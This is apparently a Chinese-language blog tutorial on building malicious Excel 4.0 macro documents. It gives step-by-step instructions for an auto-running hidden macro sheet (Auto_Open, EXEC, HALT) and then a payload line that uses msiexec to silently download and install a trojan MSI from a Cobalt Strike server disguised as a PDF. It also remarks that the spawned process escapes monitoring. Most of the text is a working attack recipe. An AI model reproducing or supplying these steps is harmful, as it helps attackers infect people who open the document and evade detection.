Office宏病毒学习第一弹--恶意的Excel 4.0宏
前言
参考:https://outflank.nl/blog/2018/10/06/old-school-evil-excel-4-0-macros-xlm/
弹药库
初始化
可以通过首先插入类型为“ MS Execel 4.0 Macro”的新表来对Microsoft Excel Spreadsheet进行武器化处理:
1、右击表单插入一张 4.0宏表
2、在第一个单元格和下面的单元格分别写入
=EXEC("calc.exe")
=HALT()
3、把第一个单元格名称A1改为Auto_Open //自动执行宏,选中A1改为Auto_Open然后回车即可成功
4、右击左下宏1表单,选择隐藏
Msiexec
实验不上cs不是我的风格,这里通过查阅资料发现可以通过使用msiexec进行远程下载执行,那么我们就可以把上面的计算器换成我们的木马,代码如下
//http://ip/download/file.pdf 为msi包文件在cs的地址
=EXEC("msiexec /q /I http://ip/download/file.pdf")
=HALT()
通过对进程进行分析office文件后,会运行msiexec.exe pid为4500,而我们在cs给出的pid是4340,与execl进程完全无关且进程未监控到我们的木马。
结语
关于更多有关Excel 4.0宏 武器化的部署,您可以查看下面的文章。
https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/